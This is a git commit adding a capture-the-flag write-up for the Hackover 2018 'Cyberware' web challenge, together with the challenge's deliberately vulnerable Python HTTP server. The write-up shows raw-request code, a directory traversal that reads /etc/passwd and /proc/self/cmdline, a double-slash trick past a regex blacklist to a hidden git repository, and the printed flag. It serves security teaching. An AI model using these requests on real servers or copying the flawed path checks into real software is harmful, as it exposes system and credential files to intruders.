cyberware writeup

Pharisaeus · Pharisaeus · commit e74c181eaa39 · 2018-10-07T16:59:46.000+02:00
diff --git a/2018-10-06-hackover/web_cyberware/README.md b/2018-10-06-hackover/web_cyberware/README.md
@@ -0,0 +1,65 @@
+# Cyberware (web, 416, 24 solved)
+
+We get access to a webpage with links to 4 ascii-art files.
+If we simply click on them, we can't see the files and we get HTTP 412 response.
+Once we dig a bit deeper we can see a strange header `HTTP/1.1 412 referer sucks`
+
+Once we send a raw request with no headers, we get back a nice picture:
+
+```python
+from crypto_commons.netcat.netcat_commons import nc
+
+
+def main():
+    s = nc("cyberware.ctf.hackover.de", 1337)
+    s.sendall("GET /fox.txt  HTTP/1.0\r\nConnection: close\r\n\r\n")
+    print(s.recv(9999))
+    print(s.recv(9999))
+    pass
+
+
+main()
+```
+
+If we look closely at the responses we can see:
+
+```
+HTTP/1.1 200 Yippie
+Server: Linux/cyber
+Date: Sun, 07 Oct 2018 14:50:19 GMT
+Content-type: text/cyber
+Content-length: 414
+```
+
+This could suggest a custom-made http server of some sort.
+Once we play around a bit we notice that there is a directory traversal there:
+
+```
+s.sendall("GET ./etc/passwd  HTTP/1.0\r\nConnection: close\r\n\r\n")
+```
+
+returns contents of `/etc/passwd` for us.
+
+Now we can get `/proc/self/cmdline` which tells us we're running `/usr/bin/python3 ./cyberserver.py`, and we can read this file to recover [server source code](cyberserver.py)
+
+The interesting part of the code is:
+
+```python
+        if path.startswith('flag.git') or search('\\w+/flag.git', path):
+            self.send_response(403, 'U NO POWER')
+            self.send_header('Content-type', 'text/cyber')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+```
+
+This suggests there is a `flag.git` repository there!
+It seems blacklisted, but `\w+` does not match `/` and they included only a single `/` in the pattern so if we send two, it will bypass the check:
+
+```
+s.sendall("GET ./home/ctf//flag.git  HTTP/1.0\r\nConnection: close\r\n\r\n")
+```
+
+We get back a nice `HTTP/1.1 406 Cyberdir not accaptable`, so we made a proper request.
+
+Now what is left is to modify some git-repo-dumper like https://github.com/internetwache/GitTools/tree/master/Dumper to grab the contents of the git repo and there we can find the flag: `hackover18{Cyb3rw4r3_f0r_Th3_w1N}`
diff --git a/2018-10-06-hackover/web_cyberware/cyberserver.py b/2018-10-06-hackover/web_cyberware/cyberserver.py
@@ -0,0 +1,125 @@
+#!/usr/bin/python3
+from threading import Thread
+from sys import argv
+from sys import getsizeof
+from time import sleep
+from socketserver import ThreadingMixIn
+from http.server import SimpleHTTPRequestHandler
+from http.server import HTTPServer
+from re import search
+from os.path import exists
+from os.path import isdir
+
+
+class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
+    pass
+
+
+class CyberServer(SimpleHTTPRequestHandler):
+    def version_string(self):
+        return f'Linux/cyber'
+
+    def do_GET(self):
+        self.protocol_version = 'HTTP/1.1'
+
+        referer = self.headers.get('Referer')
+        path = self.path[1:] or ''
+
+        if referer:
+            self.send_response(412, 'referer sucks')
+            self.send_header('Content-type', 'text/cyber')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+
+        if not path:
+            self.send_response(200, 'cyber cat')
+            self.send_header('Content-type', 'text/html')
+            self.end_headers()
+            for animal in ['cat', 'fox', 'kangaroo', 'sheep']:
+                self.wfile.write("<a href='{0}.txt'>{0}.txt</a></br>"
+                                 .format(animal).encode())
+            return
+
+        if path.endswith('/'):
+            self.send_response(403, 'You shall not list!')
+            self.send_header('Content-type', 'text/cyber')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+
+        if path.startswith('.'):
+            self.send_response(403, 'Dots are evil')
+            self.send_header('Content-type', 'text/cyber')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+
+        if path.startswith('flag.git') or search('\\w+/flag.git', path):
+            self.send_response(403, 'U NO POWER')
+            self.send_header('Content-type', 'text/cyber')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+
+        if not exists(path):
+            self.send_response(404, 'Cyber not found')
+            self.send_header('Content-type', 'cyber/error')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+
+        if isdir(path):
+            self.send_response(406, 'Cyberdir not accaptable')
+            self.send_header('Content-type', 'cyber/error')
+            self.end_headers()
+            self.wfile.write(b"Protected by Cyberware 10.1")
+            return
+
+        try:
+            with open(path, 'rb') as f:
+                content = f.read()
+
+            self.send_response(200, 'Yippie')
+            self.send_header('Content-type', 'text/cyber')
+            self.send_header('Content-length', getsizeof(content))
+            self.end_headers()
+            self.wfile.write(content)
+        except Exception:
+            self.send_response(500, 'Cyber alert')
+            self.send_header('Content-type', 'cyber/error')
+            self.end_headers()
+            self.wfile.write("Cyber explosion: {}"
+                             .format(path).encode())
+
+
+class CyberServerThread(Thread):
+    server = None
+
+    def __init__(self, host, port):
+        Thread.__init__(self)
+        self.server = ThreadingSimpleServer((host, port), CyberServer)
+
+    def run(self):
+        self.server.serve_forever()
+        return
+
+
+def main(host, port):
+    print(f"Starting cyberware at {host}:{port}")
+    cyberProtector = CyberServerThread(host, port)
+    cyberProtector.server.shutdown
+    cyberProtector.daemon = True
+    cyberProtector.start()
+    while True:
+        sleep(1)
+
+
+if __name__ == "__main__":
+    host = "0.0.0.0"
+    port = 1337
+    if len(argv) >= 2:
+        host = argv[1]
+    if len(argv) >= 3:
+        port = int(argv[3])
+    main(host, port)
